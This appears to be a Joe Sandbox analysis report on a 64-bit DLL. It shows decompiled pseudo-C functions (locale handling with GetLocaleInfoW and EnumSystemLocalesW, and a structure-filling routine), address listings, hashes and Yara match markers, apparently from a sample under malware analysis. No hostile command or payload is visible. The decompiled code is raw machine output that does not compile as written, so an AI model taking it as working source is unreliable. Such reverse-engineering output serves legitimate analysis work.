                                                                      				_t332 = __r10;
                                                                      				_t331 = __r9;
                                                                      				_t224 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_a24 = __rdi;
                                                                      				r15d = 0;
                                                                      				_v56 = __rcx;
                                                                      				_v48 = _v48 & _t339;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x140)) != _t339) goto 0x80049f3a;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x148)) != _t339) goto 0x80049f3a;
                                                                      				r12d = 0;
                                                                      				goto 0x8004a3aa;
                                                                      				r13d = 1;
                                                                      				E00000001180042404(_t114, __rcx, __rdx, __r10);
                                                                      				_t338 = _t224;
                                                                      				E0000000118003F8F4(_t224, __rcx);
                                                                      				if (_t338 != 0) goto 0x80049f64;
                                                                      				goto 0x8004a400;
                                                                      				E00000001180042404(r13d, _t335, __rdx, __r10);
                                                                      				_t334 = _t224;
                                                                      				E0000000118003F8F4(_t224, _t335);
                                                                      				if (_t334 != 0) goto 0x80049f8c;
                                                                      				_t120 = E0000000118003F8F4(_t224, _t338);
                                                                      				goto 0x80049f5c;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x140)) == _t339) goto 0x8004a2e7;
                                                                      				E00000001180042404(_t120, _t335, __rbx, __r10);
                                                                      				_t340 = _t224;
                                                                      				E0000000118003F8F4(_t224, _t335);
                                                                      				_t213 = _t340;
                                                                      				if (_t213 != 0) goto 0x80049fc0;
                                                                      				E0000000118003F8F4(_t224, _t338);
                                                                      				goto 0x80049f85;
                                                                      				_t299 =  *((intOrPtr*)(__rcx + 0x140));
                                                                      				_t11 = _t338 + 0x18; // 0x18
                                                                      				_v72 = _t11;
                                                                      				r9d = 0x15;
                                                                      				_t13 =  &_v56; // -15
                                                                      				E000000011800548F8(0, r13d, _t13,  *((intOrPtr*)(__rcx + 0x140)), __r10);
                                                                      				_t14 = _t338 + 0x20; // 0x20
                                                                      				r9d = 0x14;
                                                                      				_v72 = _t14;
                                                                      				_t16 =  &_v56; // -15
                                                                      				E000000011800548F8(0, r13d, _t16,  *((intOrPtr*)(__rcx + 0x140)), _t332);
                                                                      				_t17 = _t338 + 0x28; // 0x28
                                                                      				r9d = 0x16;
                                                                      				_v72 = _t17;
                                                                      				_t19 =  &_v56; // -15
                                                                      				E000000011800548F8(0, r13d, _t19,  *((intOrPtr*)(__rcx + 0x140)), _t332);
                                                                      				_t20 =  &_v56; // -15
                                                                      				_t21 = _t338 + 0x30; // 0x30
                                                                      				r9d = 0x17;
                                                                      				_v72 = _t21;
                                                                      				E000000011800548F8(0, r13d, _t20, _t299, _t332);
                                                                      				r9d = 0x18;
                                                                      				_t23 = _t338 + 0x38; // 0x38
                                                                      				_t336 = _t23;
                                                                      				_v72 = _t336;
                                                                      				_t25 =  &_v56; // -15
                                                                      				E000000011800548F8(0, _t331 - 0x17, _t25, _t299, _t332);
                                                                      				r9d = 0x50;
                                                                      				_t27 =  &_v56; // -15
                                                                      				_t28 = _t338 + 0x40; // 0x40
                                                                      				_v72 = _t28;
                                                                      				E000000011800548F8(0, _t331 - 0x4f, _t27, _t299, _t332);
                                                                      				r9d = 0x51;
                                                                      				_t31 =  &_v56; // -15
                                                                      				_t32 = _t338 + 0x48; // 0x48
                                                                      				_v72 = _t32;
                                                                      				E000000011800548F8(0, _t331 - 0x50, _t31, _t299, _t332);
                                                                      				_t35 =  &_v56; // -15
                                                                      				_t36 = _t338 + 0x50; // 0x50
                                                                      				r9d = 0x1a;
                                                                      				_v72 = _t36;
                                                                      				E000000011800548F8(0, 0, _t35, _t299, _t332);
                                                                      				_t38 =  &_v56; // -15
                                                                      				_t39 = _t338 + 0x51; // 0x51
                                                                      				r9d = 0x19;
                                                                      				_v72 = _t39;
                                                                      				E000000011800548F8(0, 0, _t38, _t299, _t332);
                                                                      				_t41 =  &_v56; // -15
                                                                      				_t42 = _t338 + 0x52; // 0x52
                                                                      				r9d = 0x54;
                                                                      				_v72 = _t42;
                                                                      				E000000011800548F8(0, 0, _t41, _t299, _t332);
                                                                      				_t44 = _t338 + 0x53; // 0x53
                                                                      				r9d = 0x55;
                                                                      				_v72 = _t44;
                                                                      				_t46 =  &_v56; // -15
                                                                      				E000000011800548F8(0, 0, _t46, _t299, _t332);
                                                                      				_t47 =  &_v56; // -15
                                                                      				_t48 = _t338 + 0x54; // 0x54
                                                                      				r9d = 0x56;
                                                                      				_v72 = _t48;
                                                                      				E000000011800548F8(0, 0, _t47, _t299, _t332);
                                                                      				_t50 =  &_v56; // -15
                                                                      				_t51 = _t338 + 0x55; // 0x55
                                                                      				r9d = 0x57;
                                                                      				_v72 = _t51;
                                                                      				E000000011800548F8(0, 0, _t50, _t299, _t332);
                                                                      				_t53 =  &_v56; // -15
                                                                      				_t54 = _t338 + 0x56; // 0x56
                                                                      				r9d = 0x52;
                                                                      				_v72 = _t54;
                                                                      				E000000011800548F8(0, 0, _t53, _t299, _t332);
                                                                      				_t56 =  &_v56; // -15
                                                                      				_t57 = _t338 + 0x57; // 0x57
                                                                      				r9d = 0x53;
                                                                      				_v72 = _t57;
                                                                      				E000000011800548F8(0, 0, _t56, _t299, _t332);
                                                                      				r9d = 0x15;
                                                                      				_t59 =  &_v56; // -15
                                                                      				_t60 = _t338 + 0x68; // 0x68
                                                                      				_v72 = _t60;
                                                                      				E000000011800548F8(0, _t331 - 0x13, _t59, _t299, _t332);
                                                                      				r9d = 0x14;
                                                                      				_t63 =  &_v56; // -15
                                                                      				_t64 = _t338 + 0x70; // 0x70
                                                                      				_v72 = _t64;
                                                                      				E000000011800548F8(0, _t331 - 0x12, _t63, _t299, _t332);
                                                                      				r9d = 0x16;
                                                                      				_t67 =  &_v56; // -15
                                                                      				_t68 = _t338 + 0x78; // 0x78
                                                                      				_v72 = _t68;
                                                                      				E000000011800548F8(0, _t331 - 0x14, _t67, _t299, _t332);
                                                                      				r9d = 0x17;
                                                                      				_t71 =  &_v56; // -15
                                                                      				_t72 = _t338 + 0x80; // 0x80
                                                                      				_v72 = _t72;
                                                                      				E000000011800548F8(0, _t331 - 0x15, _t71, _t299, _t332);
                                                                      				r9d = 0x50;
                                                                      				_t75 =  &_v56; // -15
                                                                      				_t76 = _t338 + 0x88; // 0x88
                                                                      				_v72 = _t76;
                                                                      				E000000011800548F8(0, _t331 - 0x4e, _t75, _t299, _t332);
                                                                      				_t79 = _t338 + 0x90; // 0x90
                                                                      				_t242 = _t79;
                                                                      				r9d = 0x51;
                                                                      				_v72 = _t242;
                                                                      				_t81 =  &_v56; // -15
                                                                      				E000000011800548F8(0, _t331 - 0x4f, _t81, _t299, _t332);
                                                                      				if (_t213 == 0) goto 0x8004a29d;
                                                                      				E00000001180049DE0(_t338);
                                                                      				E0000000118003F8F4(_t242, _t338);
                                                                      				E0000000118003F8F4(_t242, _t334);
                                                                      				E0000000118003F8F4(_t242, _t340);
                                                                      				goto 0x8004a400;
                                                                      				_t296 =  *_t336;
                                                                      				if ( *_t296 == 0) goto 0x8004a34f;
                                                                      				_t83 = _t242 - 0x30; // -48
                                                                      				_t182 = _t83;
                                                                      				if (_t182 - 9 > 0) goto 0x8004a2c9;
                                                                      				 *_t296 = _t182;
                                                                      				r13d = 1;
                                                                      				_t297 = _t296 + _t336;
                                                                      				_t152 =  *_t297;
                                                                      				if (_t152 != 0) goto 0x8004a2ab;
                                                                      				goto 0x8004a355;
                                                                      				if (_t152 != 0x3b) goto 0x8004a2b5;
                                                                      				_t329 = _t297;
                                                                      				_t183 =  *((intOrPtr*)(_t329 + 1));
                                                                      				 *_t329 = _t183;
                                                                      				if (_t183 != 0) goto 0x8004a2d0;
                                                                      				r13d = 1;
                                                                      				goto 0x8004a2be;
                                                                      				asm("movups xmm0, [eax]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [eax+0x10]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [eax+0x20]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [eax+0x30]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [eax+0x40]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [eax+0x50]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [eax+0x60]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [eax+0x70]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [eax+edx]");
                                                                      				asm("inc ecx");
                                                                      				 *((long long*)(_t338 + _t297 + 0x10)) =  *((intOrPtr*)(0x80070930 + _t297 + 0x10));
                                                                      				goto 0x8004a355;
                                                                      				r13d = 1;
                                                                      				 *_t338 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8))));
                                                                      				 *((long long*)(_t338 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 8));
                                                                      				 *((long long*)(_t338 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x10));
                                                                      				 *((long long*)(_t338 + 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x58));
                                                                      				 *((long long*)(_t338 + 0x60)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x60));
                                                                      				 *_t334 = r13d;
                                                                      				if (_t340 == 0) goto 0x8004a3aa;
                                                                      				 *_t340 = r13d;
                                                                      				if ( *((intOrPtr*)(__rcx + 0xf0)) == 0) goto 0x8004a3b9;
                                                                      				asm("lock dec dword [eax]");
                                                                      				if ( *((intOrPtr*)(__rcx + 0xe0)) == 0) goto 0x8004a3e9;
                                                                      				asm("lock xadd [ecx], eax");
                                                                      				if ((_t152 | 0xffffffff) != 1) goto 0x8004a3e9;
                                                                      				E0000000118003F8F4( *((intOrPtr*)(__rcx + 0xf0)),  *((intOrPtr*)(__rcx + 0xf8)));
                                                                      				E0000000118003F8F4( *((intOrPtr*)(__rcx + 0xf0)),  *((intOrPtr*)(__rcx + 0xe0)));
                                                                      				 *((long long*)(__rcx + 0xf0)) = _t340;
                                                                      				 *((long long*)(__rcx + 0xe0)) = _t334;
                                                                      				 *((long long*)(__rcx + 0xf8)) = _t338;
                                                                      				return 0;
                                                                      			}

























                                                                      0x180049eec
                                                                      0x180049eec
                                                                      0x180049eec
                                                                      0x180049eec
                                                                      0x180049ef1
                                                                      0x180049ef6
                                                                      0x180049f0b
                                                                      0x180049f0e
                                                                      0x180049f12
                                                                      0x180049f20
                                                                      0x180049f29
                                                                      0x180049f2b
                                                                      0x180049f35
                                                                      0x180049f3a
                                                                      0x180049f48
                                                                      0x180049f4f
                                                                      0x180049f52
                                                                      0x180049f5a
                                                                      0x180049f5f
                                                                      0x180049f6e
                                                                      0x180049f75
                                                                      0x180049f78
                                                                      0x180049f80
                                                                      0x180049f85
                                                                      0x180049f8a
                                                                      0x180049f93
                                                                      0x180049f9f
                                                                      0x180049fa6
                                                                      0x180049fa9
                                                                      0x180049fae
                                                                      0x180049fb1
                                                                      0x180049fb6
                                                                      0x180049fbe
                                                                      0x180049fc0
                                                                      0x180049fc7
                                                                      0x180049fce
                                                                      0x180049fd3
                                                                      0x180049fd9
                                                                      0x180049fe0
                                                                      0x180049fe5
                                                                      0x180049fe9
                                                                      0x180049fef
                                                                      0x180049ff7
                                                                      0x18004a000
                                                                      0x18004a005
                                                                      0x18004a009
                                                                      0x18004a00f
                                                                      0x18004a017
                                                                      0x18004a020
                                                                      0x18004a027
                                                                      0x18004a02b
                                                                      0x18004a02f
                                                                      0x18004a038
                                                                      0x18004a040
                                                                      0x18004a045
                                                                      0x18004a04b
                                                                      0x18004a04b
                                                                      0x18004a052
                                                                      0x18004a057
                                                                      0x18004a061
                                                                      0x18004a066
                                                                      0x18004a06c
                                                                      0x18004a075
                                                                      0x18004a079
                                                                      0x18004a082
                                                                      0x18004a087
                                                                      0x18004a08d
                                                                      0x18004a096
                                                                      0x18004a09a
                                                                      0x18004a0a3
                                                                      0x18004a0aa
                                                                      0x18004a0ae
                                                                      0x18004a0b2
                                                                      0x18004a0bb
                                                                      0x18004a0c2
                                                                      0x18004a0c9
                                                                      0x18004a0cd
                                                                      0x18004a0d1
                                                                      0x18004a0da
                                                                      0x18004a0e1
                                                                      0x18004a0e8
                                                                      0x18004a0ec
                                                                      0x18004a0f0
                                                                      0x18004a0f9
                                                                      0x18004a100
                                                                      0x18004a107
                                                                      0x18004a10b
                                                                      0x18004a114
                                                                      0x18004a11b
                                                                      0x18004a11f
                                                                      0x18004a126
                                                                      0x18004a12a
                                                                      0x18004a12e
                                                                      0x18004a137
                                                                      0x18004a13e
                                                                      0x18004a145
                                                                      0x18004a149
                                                                      0x18004a14d
                                                                      0x18004a156
                                                                      0x18004a15d
                                                                      0x18004a164
                                                                      0x18004a168
                                                                      0x18004a16c
                                                                      0x18004a175
                                                                      0x18004a17c
                                                                      0x18004a183
                                                                      0x18004a187
                                                                      0x18004a18b
                                                                      0x18004a194
                                                                      0x18004a19b
                                                                      0x18004a1a0
                                                                      0x18004a1a6
                                                                      0x18004a1af
                                                                      0x18004a1b3
                                                                      0x18004a1bc
                                                                      0x18004a1c1
                                                                      0x18004a1c7
                                                                      0x18004a1d0
                                                                      0x18004a1d4
                                                                      0x18004a1dd
                                                                      0x18004a1e2
                                                                      0x18004a1e8
                                                                      0x18004a1f1
                                                                      0x18004a1f5
                                                                      0x18004a1fe
                                                                      0x18004a203
                                                                      0x18004a209
                                                                      0x18004a212
                                                                      0x18004a219
                                                                      0x18004a222
                                                                      0x18004a227
                                                                      0x18004a22d
                                                                      0x18004a236
                                                                      0x18004a23d
                                                                      0x18004a246
                                                                      0x18004a24d
                                                                      0x18004a24d
                                                                      0x18004a254
                                                                      0x18004a25a
                                                                      0x18004a262
                                                                      0x18004a26a
                                                                      0x18004a271
                                                                      0x18004a276
                                                                      0x18004a27e
                                                                      0x18004a286
                                                                      0x18004a28e
                                                                      0x18004a298
                                                                      0x18004a29d
                                                                      0x18004a2a5
                                                                      0x18004a2ab
                                                                      0x18004a2ab
                                                                      0x18004a2b1
                                                                      0x18004a2b3
                                                                      0x18004a2b5
                                                                      0x18004a2bb
                                                                      0x18004a2be
                                                                      0x18004a2c2
                                                                      0x18004a2c4
                                                                      0x18004a2cb
                                                                      0x18004a2cd
                                                                      0x18004a2d0
                                                                      0x18004a2d4
                                                                      0x18004a2dd
                                                                      0x18004a2df
                                                                      0x18004a2e5
                                                                      0x18004a2f3
                                                                      0x18004a2f6
                                                                      0x18004a2fa
                                                                      0x18004a2fe
                                                                      0x18004a303
                                                                      0x18004a307
                                                                      0x18004a30c
                                                                      0x18004a310
                                                                      0x18004a315
                                                                      0x18004a319
                                                                      0x18004a31e
                                                                      0x18004a322
                                                                      0x18004a327
                                                                      0x18004a32b
                                                                      0x18004a330
                                                                      0x18004a334
                                                                      0x18004a33a
                                                                      0x18004a33e
                                                                      0x18004a348
                                                                      0x18004a34d
                                                                      0x18004a34f
                                                                      0x18004a35f
                                                                      0x18004a36d
                                                                      0x18004a37c
                                                                      0x18004a38b
                                                                      0x18004a39a
                                                                      0x18004a39e
                                                                      0x18004a3a5
                                                                      0x18004a3a7
                                                                      0x18004a3b4
                                                                      0x18004a3b6
                                                                      0x18004a3c3
                                                                      0x18004a3c8
                                                                      0x18004a3cf
                                                                      0x18004a3d8
                                                                      0x18004a3e4
                                                                      0x18004a3e9
                                                                      0x18004a3f2
                                                                      0x18004a3f9
                                                                      0x18004a41d

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89f33cc5ea04a24bd17bb93708a803a44dea006fdb0a99aade34e18879ede1e7
                                                                      • Instruction ID: c4b417a106d50bec56abfcd4722bb7df74e05f13f98dabdc5d7fcc8f7c705412
                                                                      • Opcode Fuzzy Hash: 89f33cc5ea04a24bd17bb93708a803a44dea006fdb0a99aade34e18879ede1e7
                                                                      • Instruction Fuzzy Hash: 84E16B32704B8495E761DB61E4807EE37A4F7997C8F428626AF9D67786EF39C249C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Ur]
                                                                      • API String ID: 0-600291052
                                                                      • Opcode ID: 64e690ac8426610d062dc583145fa161d3b193d70f0436ed757cb7abd9eb7821
                                                                      • Instruction ID: 31d24dbcd12508668661ae5d8fe7908bf75078d7bce04c8ad47485483ac4b111
                                                                      • Opcode Fuzzy Hash: 64e690ac8426610d062dc583145fa161d3b193d70f0436ed757cb7abd9eb7821
                                                                      • Instruction Fuzzy Hash: 0C32F4719096C88BDBF8CF24D8896DD3BF0FF48344F50255A984E9A694CBBC6685CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00000001180042F88(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                      				signed long long _t24;
                                                                      				signed long long _t26;
                                                                      				void* _t29;
                                                                      
                                                                      				 *((long long*)(_t29 + 8)) = __rbx;
                                                                      				 *(_t29 + 0x10) = _t24;
                                                                      				 *((long long*)(_t29 + 0x18)) = __rsi;
                                                                      				_t26 = (_t24 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)(__rcx + _t26 * 2)) != 0) goto 0x80042fb6;
                                                                      				if (_t26 + 1 -  !__r8 <= 0) goto 0x80042fef;
                                                                      				return 0xc;
                                                                      			}






                                                                      0x180042f88
                                                                      0x180042f8d
                                                                      0x180042f92
                                                                      0x180042fb6
                                                                      0x180042fbd
                                                                      0x180042fcb
                                                                      0x180042fee

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1787d91b7b01cab9f7a5e9b6d8eda6d83fe559f5a685be6db3c52a8f5294103
                                                                      • Instruction ID: a1fd2bab10b53138a76cc8431c182f8d484a84e1cf649b3f09138d12cc51342a
                                                                      • Opcode Fuzzy Hash: b1787d91b7b01cab9f7a5e9b6d8eda6d83fe559f5a685be6db3c52a8f5294103
                                                                      • Instruction Fuzzy Hash: 1951F432700A8485FBA19F72A9807DE7BA0F7487E8F159214FE9827B95CE38C609C744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Rie
                                                                      • API String ID: 0-476967049
                                                                      • Opcode ID: 526e540bc71e94854237864a489690c71fa8e669b7e5c6485427e735c6976a30
                                                                      • Instruction ID: b6d43f1f8199d300517ce4065ab50daf2b9c4230a98edb19c714fb75c07eaad4
                                                                      • Opcode Fuzzy Hash: 526e540bc71e94854237864a489690c71fa8e669b7e5c6485427e735c6976a30
                                                                      • Instruction Fuzzy Hash: 450266B5900709CFDB98CF28D59A5DD7BB9FB45348F004129FC0E9A2A0D3B4E919CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 56%
                                                                      			E0000000118004C5B0(void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
                                                                      				void* _v8;
                                                                      				signed int _v24;
                                                                      				char _v264;
                                                                      				unsigned int _t22;
                                                                      				signed int _t23;
                                                                      				void* _t25;
                                                                      				unsigned int _t33;
                                                                      				intOrPtr _t38;
                                                                      				signed long long _t53;
                                                                      				signed long long _t54;
                                                                      				void* _t56;
                                                                      				unsigned int* _t67;
                                                                      				signed long long _t69;
                                                                      				void* _t71;
                                                                      
                                                                      				_t64 = __rdx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_t53 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t54 = _t53 ^ _t71 - 0x00000120;
                                                                      				_v24 = _t54;
                                                                      				_t56 = __rcx;
                                                                      				E0000000118003CFF0(_t54, __rcx, __rdx, __rsi);
                                                                      				_t69 = _t54;
                                                                      				E0000000118003CFF0(_t54, _t56, _t64, _t69);
                                                                      				_t67 =  *((intOrPtr*)(_t54 + 0x3a0));
                                                                      				_t22 = E0000000118004C6B8(_t56, _t64);
                                                                      				r9d = 0x78;
                                                                      				_t33 = _t22;
                                                                      				asm("sbb edx, edx");
                                                                      				_t23 = GetLocaleInfoW(??, ??, ??, ??);
                                                                      				if (_t23 != 0) goto 0x8004c62b;
                                                                      				 *_t67 =  *_t67 & _t23;
                                                                      				goto 0x8004c693;
                                                                      				_t25 = E00000001180014B1C(_t54,  *((intOrPtr*)(_t69 + 0x98)));
                                                                      				_t38 =  *((intOrPtr*)(_t69 + 0xb0));
                                                                      				if (_t25 != 0) goto 0x8004c64f;
                                                                      				if (_t38 != 0) goto 0x8004c680;
                                                                      				goto 0x8004c672;
                                                                      				if (_t38 != 0) goto 0x8004c689;
                                                                      				if ( *((intOrPtr*)(_t69 + 0xac)) == _t38) goto 0x8004c689;
                                                                      				if (E00000001180014B1C(_t54,  *((intOrPtr*)(_t69 + 0x98))) != 0) goto 0x8004c689;
                                                                      				if (E0000000118004C7DC(_t33, 0, _t54, _t56,  *((intOrPtr*)(_t69 + 0x98)),  &_v264, _t69) == 0) goto 0x8004c689;
                                                                      				 *_t67 =  *_t67 | 0x00000004;
                                                                      				_t67[1] = _t33;
                                                                      				_t67[2] = _t33;
                                                                      				return E000000011800028F0( !( *_t67 >> 2) & 0x00000001, _t33, _v24 ^ _t71 - 0x00000120);
                                                                      			}

















                                                                      0x18004c5b0
                                                                      0x18004c5b0
                                                                      0x18004c5b5
                                                                      0x18004c5c2
                                                                      0x18004c5c9
                                                                      0x18004c5cc
                                                                      0x18004c5d4
                                                                      0x18004c5d7
                                                                      0x18004c5dc
                                                                      0x18004c5df
                                                                      0x18004c5e7
                                                                      0x18004c5ee
                                                                      0x18004c600
                                                                      0x18004c608
                                                                      0x18004c60a
                                                                      0x18004c618
                                                                      0x18004c620
                                                                      0x18004c622
                                                                      0x18004c629
                                                                      0x18004c637
                                                                      0x18004c63c
                                                                      0x18004c644
                                                                      0x18004c648
                                                                      0x18004c64d
                                                                      0x18004c651
                                                                      0x18004c659
                                                                      0x18004c66e
                                                                      0x18004c67e
                                                                      0x18004c680
                                                                      0x18004c683
                                                                      0x18004c686
                                                                      0x18004c6b7

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 673564084-0
                                                                      • Opcode ID: 04fff14703dedbb10c3c05d2c6a041afa3691c681803a8dd1a3c66ddb6cc07ef
                                                                      • Instruction ID: a7c08d8bb0a980455c0b66a7d20b305a9478da93032627e2a1321a5c573ffad1
                                                                      • Opcode Fuzzy Hash: 04fff14703dedbb10c3c05d2c6a041afa3691c681803a8dd1a3c66ddb6cc07ef
                                                                      • Instruction Fuzzy Hash: BF31C332305A8886EBE5DF25E4817DA73A1F78C7C8F42D135BA4983396DF38D6088701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: VGL
                                                                      • API String ID: 0-3868899587
                                                                      • Opcode ID: b788162f0c7f1e343e5ebd9412dadc3896a0e0c79e9535f9615901b8107fa579
                                                                      • Instruction ID: 88fd8e9f532b51002f520af8708de9894633ef9d2d9f7a2c3754688824df04e1
                                                                      • Opcode Fuzzy Hash: b788162f0c7f1e343e5ebd9412dadc3896a0e0c79e9535f9615901b8107fa579
                                                                      • Instruction Fuzzy Hash: E0F1F770E0470E8FDB58DFA8D45A9DEBBF2FB58344F000119D846B7290DBB49919CBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 30%
                                                                      			E0000000118004C1D4(void* __ecx, void* __edx, void* __rax, long long __rbx, signed int* __rcx, void* __rdx, signed int __r8, long long _a8) {
                                                                      				signed int _t35;
                                                                      				signed char _t36;
                                                                      				signed char _t37;
                                                                      				signed int _t52;
                                                                      				void* _t54;
                                                                      				signed int* _t58;
                                                                      				signed short** _t65;
                                                                      				void* _t66;
                                                                      				signed long long _t71;
                                                                      				signed long long _t72;
                                                                      				signed long long _t74;
                                                                      
                                                                      				_t54 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_t58 = __rcx;
                                                                      				E0000000118003CFF0(__rax, __rcx, __rdx, _t66);
                                                                      				_t71 = __r8 | 0xffffffff;
                                                                      				_t2 = _t54 + 0x98; // 0x98
                                                                      				_t65 = _t2;
                                                                      				_t74 = _t71 + 1;
                                                                      				if (( *_t65)[_t74] != 0) goto 0x8004c1f9;
                                                                      				_t65[3] = 0 | _t74 == 0x00000003;
                                                                      				_t72 = _t71 + 1;
                                                                      				if (_t65[1][_t72] != 0) goto 0x8004c213;
                                                                      				r8d = 2;
                                                                      				_t65[3] = 0 | _t72 == 0x00000003;
                                                                      				_t58[1] = 0;
                                                                      				if (_t65[3] != 0) goto 0x8004c262;
                                                                      				r10d = 0;
                                                                      				r9d =  *( *_t65) & 0x0000ffff;
                                                                      				_t16 = _t74 - 0x41; // 0x58
                                                                      				if (_t16 - 0x19 <= 0) goto 0x8004c25a;
                                                                      				r9w = r9w - 0x61;
                                                                      				if (r9w - 0x19 > 0) goto 0x8004c25f;
                                                                      				r10d =  &(r10d[0]);
                                                                      				goto 0x8004c23d;
                                                                      				r8d = r10d;
                                                                      				_t65[2] = r8d;
                                                                      				_t35 = EnumSystemLocalesW(??, ??);
                                                                      				_t52 =  *_t58 & 0x00000007;
                                                                      				asm("bt ecx, 0x9");
                                                                      				_t36 = _t35 & 0xffffff00 | _t52 > 0x00000000;
                                                                      				asm("bt ecx, 0x8");
                                                                      				_t37 = _t36 & 0xffffff00 | _t52 > 0x00000000;
                                                                      				if ((_t37 & (0 | _t52 != 0x00000000) & _t36) != 0) goto 0x8004c296;
                                                                      				 *_t58 = 0;
                                                                      				return _t37;
                                                                      			}














                                                                      0x18004c1d4
                                                                      0x18004c1d4
                                                                      0x18004c1de
                                                                      0x18004c1e1
                                                                      0x18004c1e6
                                                                      0x18004c1ef
                                                                      0x18004c1ef
                                                                      0x18004c1f9
                                                                      0x18004c201
                                                                      0x18004c20c
                                                                      0x18004c213
                                                                      0x18004c21b
                                                                      0x18004c223
                                                                      0x18004c22c
                                                                      0x18004c22f
                                                                      0x18004c235
